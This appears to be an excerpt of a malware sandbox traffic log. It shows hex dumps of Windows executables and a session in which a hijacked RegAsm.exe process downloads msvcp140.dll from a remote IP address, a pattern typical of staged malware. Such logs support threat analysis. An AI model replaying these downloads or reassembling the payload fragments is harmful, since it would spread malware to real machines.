                                                                                                                                                                                                                                          2024-10-02 12:43:39 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                          2024-10-02 12:43:39 UTC16384INData Raw: 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00
                                                                                                                                                                                                                                          Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                                                                                                                                          2024-10-02 12:43:39 UTC16384INData Raw: ff ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d
                                                                                                                                                                                                                                          Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc
                                                                                                                                                                                                                                          2024-10-02 12:43:39 UTC16384INData Raw: e9 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05
                                                                                                                                                                                                                                          Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                                                                                                          2024-10-02 12:43:39 UTC16384INData Raw: 00 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0
                                                                                                                                                                                                                                          Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                                                                                                          2024-10-02 12:43:39 UTC16384INData Raw: e9 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                                                                                                                                          2024-10-02 12:43:40 UTC16384INData Raw: 04 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24
                                                                                                                                                                                                                                          Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$
                                                                                                                                                                                                                                          2024-10-02 12:43:40 UTC16384INData Raw: 81 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33
                                                                                                                                                                                                                                          Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3
                                                                                                                                                                                                                                          2024-10-02 12:43:40 UTC16384INData Raw: 0b 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00
                                                                                                                                                                                                                                          Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                                                                                          2024-10-02 12:43:40 UTC16384INData Raw: 10 b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24
                                                                                                                                                                                                                                          Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          34192.168.2.65855149.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC196OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:41 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 450024
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Last-Modified: Wednesday, 02-Oct-2024 12:43:41 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC16384INData Raw: 00 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00
                                                                                                                                                                                                                                          Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mn
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC16384INData Raw: 00 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC16384INData Raw: 18 d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9
                                                                                                                                                                                                                                          Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC16384INData Raw: 6a 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74
                                                                                                                                                                                                                                          Data Ascii: jatAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC16384INData Raw: 85 c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00
                                                                                                                                                                                                                                          Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC16384INData Raw: f0 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e
                                                                                                                                                                                                                                          Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC16384INData Raw: e8 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7
                                                                                                                                                                                                                                          Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                                                                                                          2024-10-02 12:43:41 UTC16384INData Raw: cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06
                                                                                                                                                                                                                                          Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv
                                                                                                                                                                                                                                          2024-10-02 12:43:42 UTC16384INData Raw: f6 e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57
                                                                                                                                                                                                                                          Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


